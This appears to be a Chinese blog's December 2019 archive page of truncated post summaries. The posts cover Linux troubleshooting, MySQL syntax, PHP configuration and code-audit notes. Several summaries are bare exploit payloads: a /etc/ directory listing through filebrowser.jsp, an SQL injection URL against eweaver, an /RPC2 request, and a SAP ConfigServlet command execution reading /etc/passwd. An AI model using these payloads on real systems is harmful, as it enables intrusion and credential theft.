12 2019 档案
摘要:原文:https://www.cnblogs.com/Huiw/articles/9527281.html Linux系统死机了怎么办?怎样让系统在死机以后如何安全的让他摆脱死机状态,本文讲述如何从 linux 的死机状态中挣脱出来。 Linux 死机有很多种情况,最常见的是系统负载过高导致的。如上
阅读全文
摘要:今天在熟悉Linux命令的时候,使用top查看服务器负载的时候,发现了zombie(简单理解成僵尸吧)这个参数 这个参数就代表僵尸进程的含义,什么是僵尸进程呢?(这里盗用一下官方的解释) 一个进程在调用exit命令结束自己的生命的时候,其实它并没有真正的被销毁,而是留下一个称为僵尸进程(Zombie
阅读全文
摘要:SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] [SQL_CACHE | SQL_NO_CAC
阅读全文
摘要:文件位置 ./install/index.php 影响版本 PHP V5.0 过程 + 通过获取GET请求判断是安装还是结束安装 + 安装步骤1 + 安装步骤2 + 安装步骤3 + 安装步骤4 解释 安装步骤1 3都没有校验程序是否已经安装过 步骤4是安装成功后的信息 所以只要重新访问./insta
阅读全文
摘要:floor,updatexml,extractvalueGeometryCollection,polygon,GTID_SUBSET,multipoint,multilinestring,multipolygon,LINESTRING,exp; 待整理 procedure analyse
阅读全文
摘要:起因 正在学习代码审计 看到有人提交了一个注入https://www.cnvd.org.cn/flaw/show/CNVD 2019 42775 想试试看还有没有别的漏洞 受影响版本 v1.6.3 2019 11 24 更新 后台GETSHELL + 后台地址 系统设置 基本设置 高级设置 允许长传
阅读全文
摘要:``` url//document/imp/filebrowser.jsp?dir=/etc/ ```
阅读全文
摘要:``` URL/ServiceAction/com.eweaver.base.DataAction?sql=select%201,2,3,4,5,6,7,8,9,233%20from%20DUAL%20 ```
阅读全文
摘要:```POST /RPC2 HTTP/1.1Host: localhostAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-w...
阅读全文
摘要:http://xxxxxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat /etc/passwd
阅读全文
摘要:php核心配置 php.ini 基本配置 语法 + 大小写敏感 + 运算符 + 空值的表达式 安全模式 + 安全模式 用来限制文档的存取,限制环境变量的存取,控制外部程序的执行. PHP5.4.0移除 + 限制环境变量存取 指定php程序可以改变的环境变量的前缀,当这个选项的值为空时,那么php可以
阅读全文
